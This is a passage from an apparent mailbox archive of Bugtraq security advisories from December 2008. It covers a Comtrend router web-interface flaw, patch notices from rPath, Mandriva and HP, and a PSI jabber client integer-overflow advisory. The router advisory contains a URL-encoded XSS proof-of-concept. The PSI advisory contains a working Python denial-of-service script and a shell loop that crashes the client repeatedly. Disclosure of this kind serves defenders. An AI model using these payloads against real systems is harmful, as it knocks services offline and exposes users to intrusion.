III. DESCRIPTION
-------------------------
Improper validation of micro_httpd server permits multiple attacks
though this stateless server. Also, access control is defficient and
do not control access at all. Credentials are send in clear text so
"user" could get them easily.

Some fields and data are not filtered so XSS attacks and bofs can DoS
the httpd config server. Some cases the result also applies not only
to http and the router needs reboot, loosing the configuration and
reseting to default values. This means default passwords, open
wireless network, etc.

IV. PROOF OF CONCEPT
-------------------------
1. User "user" (least privileged user, read only and limited access
configuration reding)  can ask a not allowed resource and the server
will return the page asked. Included the password change resource:

http://192.168.0.1/password.html

2. The router sends the 3 users passwords in clear inside the html to
make a fast check during the password change.

3. Some points in the configuration description options are
vulenrables to Cross Site SCripting attacks due improper validatation:

http://192.168.0.1/scvrtsrv.cmd?action�d&srvName=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&srvAddr2.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd=1

4. Some resources (i.e. NAT table are vulnerable to Buffer overflows
attacks) through the description fields that seems to kill the
micro_httpd server although the router continues routing. Also similar
behaviour is seen when asking for URLs that add %13 and %10 chars,
without matching micro_httpd checks "..", "../", "/../".

5. User "user" accesses with "admin" privileges when connecting
through TELNET service.

6. User "support" seems to not exist at all.

7. SSH service cannot substitute TELNET or HTTP due it seems not
exists at all in the router!

V. BUSINESS IMPACT
-------------------------
DoS of the Web Configuration interface although the router continues
routing.
DoS of router, causing a set to reset configuration, meaning the start
up of Wireless interface (activated by default) without any type of
protection and having the possibility to access the router or the network.
Reset of router configuration.
Access with "admin" (privileged) permissions to user "user".

VI. SYSTEMS AFFECTED
-------------------------
Firmware until version A101-302JAZ-C01_R05 (current)

VII. SOLUTION
-------------------------
Change the router.

VIII. REFERENCES
-------------------------
http://www.comtrend.com
http://www.acme.com/software/micro_httpd/
http://www.jazztel.com

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by
Daniel Fernandez Bleda (dfernandez (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
January   30, 2007: Initial release
April     18, 2007: First contact with the vendor. Minor corrections.
November  09, 2007: Some corrections applied.

XI. DISCLOSURE TIMELINE
-------------------------
January   30, 2007: Vulnerability acquired by
                    Internet Security Auditors
April     18, 2007: Initial vendor notification sent. No response.
May       01, 2007: Second vendor notification.
                    Response: will be studied.
May       22, 2007: Third vendor contact. Reported to their vendor for
                    analysis.
August    07, 2007: Fourth Vendor contact. Problem seems to be not
                    much easy to correct. R/D Dept are studying the
                    solution.
November  09, 2007: Fifth Vendor contact. No response.
November  19, 2007: Sixth Vendor contact. No response.
December  07, 2007: Seventh Vendor contact. Chipset vendor is working.
November  11, 2008: Last Vendor contact. No response
December  22, 2008: Published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.

From - Mon Dec 22 15:49:34 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005406
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39007-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id B229AED200
for <lists@securityspace.com>; Mon, 22 Dec 2008 15:45:10 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 15CC023707C; Mon, 22 Dec 2008 12:50:49 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 13559 invoked from network); 22 Dec 2008 19:00:50 -0000
X-Authentication-Warning: logo.rdu.rpath.com: juphoff set sender to rPath Update Announcements <announce-noreply@rpath.com> using -r
Date: Mon, 22 Dec 2008 14:20:06 -0500
From: rPath Update Announcements <announce-noreply@rpath.com>
To: security-announce@lists.rpath.com,
update-announce@lists.rpath.com, security-announce@lists.rpath.com,
update-announce@lists.rpath.com
Cc: full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
bugtraq@securityfocus.com, lwn@lwn.net,
full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
bugtraq@securityfocus.com, lwn@lwn.net
Subject: rPSA-2008-0341-1 dovecot
Message-ID: <494fe866.tq6kem4ph3lcryu+%announce-noreply@rpath.com>
User-Agent: nail 11.22 3/20/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   

rPath Security Advisory: 2008-0341-1
Published: 2008-12-22
Products:
    rPath Linux 1
    rPath Linux 2

Rating: Severe
Exposure Level Classification:
    Local User Deterministic Privilege Escalation
Updated Versions:
    dovecot=conary.rpath.com@rpl:1/1.0.15-0.1-1
    dovecot=conary.rpath.com@rpl:2/1.0.15-0.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2930

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4870

Description:
    Previous versions of the dovecot package contain multiple
    vulnerabilities, the most serious of which allow authenticated
    users to bypass intended access restrictions.

http://wiki.rpath.com/Advisories:rPSA-2008-0341

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From - Mon Dec 22 15:59:34 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005407
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38995-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 26808ECC00
for <lists@securityspace.com>; Mon, 22 Dec 2008 15:53:39 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id BEE901438FB; Mon, 22 Dec 2008 09:53:41 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25924 invoked from network); 22 Dec 2008 08:54:49 -0000
Date: 22 Dec 2008 09:14:25 -0000
Message-ID: <20081222091425.4151.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: mikael.albrecht@f-secure.com
To: bugtraq@securityfocus.com
Subject: Re: [IVIZ-08-016] F-Secure f-prot Antivirus for Linux corrupted
 ELF header Security Bypass
Status:   

This posting contains incorrect information. 

F-Secure Corporation has verified that the claimed vulnerability doesn�t affect any F-Secure products. Our assumption is that iViZ have mixed up products from F-Secure Corporation and Frisk Software International. iViZ have already corrected their own advisory at the time of writing this and removed all references to F-Secure.

Mikael Albrecht
F-Secure Corporation

From - Mon Dec 22 18:19:34 2008
X-Account-Key: account7
X-UIDL: 4909bb8c0000540a
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39008-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id CE68AED1FB
for <lists@securityspace.com>; Mon, 22 Dec 2008 18:09:56 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 7CBCF14394A; Mon, 22 Dec 2008 15:02:25 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17400 invoked from network); 22 Dec 2008 19:42:41 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=moe5gr6Hh7MivAmF4NUA:9 apVADzFq3k42tmjTkvkA:7 a=u6ob_7r2nnYlHd64Fm8J407RUwwA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVA-2008:241 ] mailscanner
Date: Mon, 22 Dec 2008 13:07:00 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LEr3M-0007uN-KX@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                          MDVA-2008:241
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : mailscanner
 Date    : December 22, 2008
 Affected: Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 Local users can use symlink attacks throughout a flaw on
 trend-autoupdate script of MailScanner by using /tmp/opr.ini.#####
 or /tmp/lpt temporary file (CVE-2008-5140).
 
 Local users can use symlink attacks throughout flaws on
 clamav-autoupdate, panda-autoupdate and rav-autoupdate scripts of
 MailScanner by using ClamAV.update.log, pav.zip and RavBusy.lock
 temporary files (CVE-2008-5312).
 
 Local users can use symlink attacks throughout flaws on
 kaspersky-wrapper, bitdefender-wrapper, rav-wrapper scripts and
 Quarentine.pm, TNEF.pm, SA.pm, WorkArea.pm MailScanner perl modules
 by using kavoutput.tmp.27073, log.bdc.27073, report.vir.27073,
 MailScanner.ownertest.27073, tnef.27073 and MS.bayes.rebuild.lock
 temporary files (CVE-2008-5313).
 
 Further MailScanner had symlink flaws on antivir-autoupdate,
 bitdefender-autoupdate, clamav-autoupdate, etrust-autoupdate,
 generic-autoupdate, inoculan-autoupdate, kaspersky-autoupdate,
 nod32-autoupdate, norman-autoupdate, rav-autoupdate,
 sophos-autoupdate, symscanengine-autoupdate, vexira-autoupdate,
 f-prot-autoupdate and css-autoupdate scripts under following
 temporary vulnerable files: AntiVirBusy.lock, BitDefenderBusy.lock,
 ClamAVBusy.lock, eTrustBusy.lock, GenericBusy.lock, InoculanBusy.lock,
 KasperskyBusy.lock, Nod32Busy.lock, NormanBusy.lock, RavBusy.lock,
 SophosBusy.lock, SymScanEngineBusy.lock, VexiraBusy.lock,
 FProtBusy.lock and SYMCScan.lock.
 
 This update provides fix for all symlink flaws described on this
 security advisory.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5140
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5312
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5313
 _______________________________________________________________________

 Updated Packages:

 Corporate 4.0:
 4e93bc7c48ec8f65122d263237b99ec9  corporate/4.0/i586/mailscanner-4.55.9_1-3.1.20060mlcs4.noarch.rpm
 f92acdbed4f63778609726eaa2dc8fd1  corporate/4.0/i586/mailscanner-spamassassin-4.55.9_1-3.1.20060mlcs4.noarch.rpm 
 35f1b7e0cc1534def4394e7bec95ab48  corporate/4.0/SRPMS/mailscanner-4.55.9_1-3.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 4e93bc7c48ec8f65122d263237b99ec9  corporate/4.0/x86_64/mailscanner-4.55.9_1-3.1.20060mlcs4.noarch.rpm
 f92acdbed4f63778609726eaa2dc8fd1  corporate/4.0/x86_64/mailscanner-spamassassin-4.55.9_1-3.1.20060mlcs4.noarch.rpm 
 35f1b7e0cc1534def4394e7bec95ab48  corporate/4.0/SRPMS/mailscanner-4.55.9_1-3.1.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJT8jcmqjQ0CJFipgRArRHAKDH4O/m1AfoakbcAK7monhnYH5eywCg8m1k
OPwl0ksaHvGa9rLs78PtnwQ=St+b
-----END PGP SIGNATURE-----

From - Wed Dec 24 16:19:35 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054d7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39010-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 85FF9EC1AD
for <lists@securityspace.com>; Wed, 24 Dec 2008 16:11:45 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 3AD5B143732; Wed, 24 Dec 2008 13:54:09 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 30857 invoked from network); 22 Dec 2008 23:44:02 -0000
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBST02397 SSRT080187 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-078
Date: Mon, 22 Dec 2008 16:03:42 -0800
Sender: secure@hpchs.cup.hp.com
Message-Id: <20081223000342.A63ABBE44@hpchs.cup.hp.com>
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01634640
Version: 1

HPSBST02397 SSRT080187 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-078

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2008-12-22
Last Updated: 2008-12-22

Potential Security Impact: Please check the table below

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Various potential security vulnerabilities have been identified in Microsoft software that is running on the Storage Management Appliance (SMA). Some of these vulnerabilities may be pertinent to the SMA, please check the table in the Resolution section of this Security Bulletin.

References: MS08-078 (CVE-2008-4844) 

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Storage Management Appliance v2.1 Software running on: 

Storage Management Appliance I 
Storage Management Appliance II 
Storage Management Appliance III 

BACKGROUND

CVSS 2.0 Base Metrics 
==============================================Reference                         Base Vector               Base Score 
 --                                Not Applicable                    --
==============================================Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

Patches released by Microsoft after MS06-051 are covered by monthly Security Bulletins.

For the full archived list of Microsoft security updates applicable for Storage Management Appliance software v2.1, please refer to the following Security Bulletins available on the IT Resource Center (ITRC) Web site: http://www.itrc.hp.com/service/cki/secBullArchive.do 


For patches released by Microsoft in 2003, MS03-001 to MS03-051 refer to Security Bulletin HPSBST02146 
For patches released by Microsoft in 2004, MS04-001 to MS04-045 refer to Security Bulletin HPSBST02147 
For patches released by Microsoft in 2005, MS05-001 to MS05-055 refer to Security Bulletin HPSBST02148 
For patches released by Microsoft in 2006, MS06-001 to MS06-051 refer to Security Bulletin HPSBST02140 

The Microsoft patch index archive and further details about all Microsoft patches can be found on the following Web site: http://www.microsoft.com/technet/security/bulletin/summary.mspx 

Note: The SMA must have all pertinent SMA Service Packs applied 

Windows 2000 Update Rollup 1

Customers are advised to download and install the Windows 2000 Update Rollup 1 for Service Pack 4 on SMA v2.1. For more information please refer to the Windows 2000 Update Rollup 1 for Service Pack 4 and Storage Management Appliance v2.1 advisory at the following website: http://h20000.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?contentType=SupportManual&lang=en&cc=us&docIndexId9111&taskId1&prodTypeId169&prodSeriesId15667 

Windows 2000 Update Rollup 1 for SP4 does not include security updates released after April 30, 2005 starting from MS05-026. It also does not include patches MS04-003 and MS04-028. Please install these patches in addition to Windows 2000 Update Rollup 1 for SP4, if they have not been installed already

RESOLUTION
HP strongly recommends the immediate installation of all security patches that apply to third party software which is integrated with SMA software products supplied by HP, and that patches are applied in accordance with an appropriate patch management policy.

Note: Patch installation instructions are shown at the end of this table. 

 ------------------------------------------------- 
MS Patch - MS08-078 Security Update for Internet Explorer (960714)
Analysis - Possible security issue exists. Patch will run successfully.
Action - For SMA v2.1, customers should download patch from Microsoft and install:
Internet Explorer 6 SP1
Or
Internet Explorer 5.01 SP4
To determine your IE version check the IE help page.
 -------------------------------------------------  

Installation Instructions: (if applicable) 


Download patches to a system other than the SMA 
Copy the patch to a floppy diskette or to a CD 
Execute the patch by using Terminal Services to the SMA or by attaching a keyboard, monitor and mouse to the SMA. 

Note: The Microsoft Windows Installer 3.1 is supported on SMA v2.1. For more information please refer at the following website: http://www.microsoft.com/downloads/details.aspx?FamilyID�9482fc-5f56-4a38-b838-de776fd4138c&hash=SYSSXDF&displaylang=en 


PRODUCT SPECIFIC INFORMATION 
None 

HISTORY 
Version:1 (rev.1) - 22 December 2008 Initial release 


Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

�Copyright 2008 Hewlett-Packard Development Company, L.P. 

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSVAMOOAfOvwtKn1ZEQIA8wCgovlmo8AhZWDDRKiRMXE8v10uEpEAmQFP
EhPrwcfBHUfn4xF7TpeRL65i
=SnWJ
-----END PGP SIGNATURE-----

From - Wed Dec 24 16:19:35 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054d8
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39014-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id CD02CEE61F
for <lists@securityspace.com>; Wed, 24 Dec 2008 16:16:20 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 768F4143879; Wed, 24 Dec 2008 13:59:23 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12111 invoked from network); 23 Dec 2008 10:56:02 -0000
Message-ID: <4950C932.7070001@isecauditors.com>
Date: Tue, 23 Dec 2008 12:19:14 +0100
From: ISecAuditors Security Advisories <advisories@isecauditors.com>
Organization: Internet Security Auditors
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: [ISecAuditors Security Advisories] PSI remote integer overflow DoS
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   

============================================INTERNET SECURITY AUDITORS ALERT 2008-004
- Original release date: 12th December, 2008
- Last revised: 22nd December, 2008
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
============================================
I. VULNERABILITY
-------------------------
PSI remote integer overflow DoS

II. BACKGROUND
-------------------------
PSI is a widely used jabber client Qt4 based, available for Windows,
Mac, linux, and other operative systems.

III. DESCRIPTION
-------------------------
In order doing file transfers, a open port is needed (by default is
8010/tcp)

If first byte of data stream is a 0x05, it means socks5 option and we
enter in the vulnerable zone of the code.

Is possible to satisfy the jump: cmp al, 5  -> je vulnCheck()

The second byte is the amount of bytes to memcpy, but there is a check:

cmp ecx, 10 -> jg goHome()

Well the signed comparison lets us to send negative values, the
acepted range are <= 10 and > 0x7f (it shoud be compared as unsigned)
then the check can be bypased with this int overflow, now we can play
with 0x80 - 0xff range, and the rest of the stream.

By now we pass successfully the QByteArray.Resize() and
QByteArray.Realloc()

And arrive to the memcpy, from all the data stream sended, n bytes
will be copied, n is controlled by us :)
The problem to make a heap overflow, is that the destiny variable will
be resized to n. Then is possible to hangup the process or also the
system with these two ways

1. Can send a only two bytes buffer \x05\xff then the memcpy's rep
movz will access to non paged source, becouse we don't sent the bytes
we are saying to copy.
2. Can be sended a very large buffer and firce a large copy of memory.
The system can be saturated.

IV. PROOF OF CONCEPT
-------------------------
#!/usr/bin/python
#by sha0 remote integer overflow DoS  (Linux && windows)
#http://jolmos.blogspot.com

import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    sock.connect((sys.argv[1],8010))
except:
    print 'Cannot connect!'
    sys.exit(1)

try:
    sock.send('\x05\xff')
    print 'Crashed!'
except:
    print 'Cannot send!'

sock.close()
#eof

The process can be crashed remotelly by:
./PSIcoKiller.py <ip>

PSI down forever:
while [ 1 ]; do ./PSIcoKiller.py <ip> ;done

V. BUSINESS IMPACT
-------------------------
Remote/local Denial of Service of the communications.

VI. SYSTEMS AFFECTED
-------------------------
PSI 0.11, 0.12 and 0.13 (last)
PSI 0.10 not affected
PSI 0.12.1 Solves the problem

Tested in Linux and Windows, but may crash other heap implementations.

VII. SOLUTION
-------------------------
PSI 0.12.1 solves the problem, nevertheless i suggest filter this port
whenever possible.
Thanks to kev and infinity for their quick response.

VIII. REFERENCES
-------------------------
http://psi-im.org

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
December  12, 2008: Initial release
December  17, 2008: update the new that 0.12.1 solves the problem.

XI. DISCLOSURE TIMELINE
-------------------------
November  20, 2008: Vulnerability acquired by
                    Internet Security Auditors
December  02, 2008: Vendor notification
December  12, 2008: Advisory documentation
December  18, 2008: Vendor Release 0.12.1
December  23, 2008: Published

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

From - Wed Dec 24 16:29:36 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054da
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39013-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 6D3F3EC6C5
for <lists@securityspace.com>; Wed, 24 Dec 2008 16:28:32 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 9B04B143873; Wed, 24 Dec 2008 13:57:03 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 7924 invoked from network); 23 Dec 2008 06:38:47 -0000
Date: Mon, 22 Dec 2008 23:42:38 -0700
Message-Id: <200812230642.mBN6gcPI020470@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: olga@russkoyepole.ru
To: bugtraq@securityfocus.com
Subject: Re: rPSA-2008-0341-1 dovecot
Status:   

What Dovecot version prior?

From - Wed Dec 24 16:49:35 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054db
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39018-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 687C0EE766
for <lists@securityspace.com>; Wed, 24 Dec 2008 16:41:43 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 33CC71438BC; Wed, 24 Dec 2008 14:01:41 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19720 invoked from network); 23 Dec 2008 17:37:54 -0000
Date: Tue, 23 Dec 2008 11:57:36 -0600
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-677-2] OpenOffice.org Internationalization update
Message-ID: <20081223175736.GB29923@severus.strandboge.com>
